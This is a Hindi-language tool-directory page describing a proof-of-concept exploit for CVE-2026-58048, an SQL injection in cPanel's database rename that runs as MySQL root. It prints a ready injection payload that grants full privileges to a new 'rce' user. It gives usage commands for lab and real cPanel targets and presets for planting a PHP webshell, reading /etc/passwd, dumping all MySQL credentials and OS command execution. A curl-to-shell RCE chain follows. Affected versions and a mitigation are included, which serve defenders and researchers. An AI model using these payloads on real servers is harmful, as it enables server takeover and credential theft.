Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2026-58048 — सुरक्षा अनुसंधान परियोजना | Kitploit
उपकरण/GitHubGitHub/imbas007/poc-cve-2026-58048
विशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षालैब और अभ्यास
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

सुरक्षा अनुसंधान परियोजना

रिपॉजिटरी देखें
1251 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-58048

CVSS 4.0: 9.4 (गंभीर) | CWE-89: SQL Injection | NVD

प्रमाणित cPanel उपयोगकर्ता → डेटाबेस रीनेम के माध्यम से MySQL root के रूप में मनमाना SQL। cPanel रूट के रूप में रीनेम ऑपरेशन निष्पादित करते समय उपयोगकर्ता के सत्र sql_mode (ANSI_QUOTES) को अनुचित रूप से संरक्षित रखता है — डेटाबेस नाम में एक backtick पहचानकर्ता से बाहर निकलकर SQL इंजेक्ट कर देता है।

name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

त्वरित आरंभ (Docker लैब)

pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

लैब मोड स्वतः पहचाना जाता है — किसी --lab फ़्लैग की आवश्यकता नहीं है।

वास्तविक cPanel लक्ष्य

python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

पेलोड प्रीसेट

प्रीसेटप्रभाव
admin-user (डिफ़ॉल्ट)MySQL admin उपयोगकर्ता rce बनाएं
compact-adminछोटा admin पेलोड (<64 अक्षर — वास्तविक cPanel की नाम सीमा में फिट बैठता है; सत्यापित करें: r/p)
webshellINTO OUTFILE के माध्यम से PHP शेल लिखें (--shell /var/www/html/shell.php)
read-fileLOAD_FILE के माध्यम से सर्वर फ़ाइल पढ़ें (--file /etc/passwd)
dump-usersसभी MySQL क्रेडेंशियल को pwn.users में डंप करें
udf-rceUDF के माध्यम से OS कमांड निष्पादन

कस्टम SQL: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

पूर्ण RCE श्रृंखला (लैब)

# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

प्रभावित संस्करण

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

शमन: अपग्रेड करें, या cPanel उपयोगकर्ताओं से MySQL सुविधा रद्द कर दें।

संदर्भ

  • cPanel एडवाइज़री
  • SecurityOnline

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए।

टूल डाउनलोड करें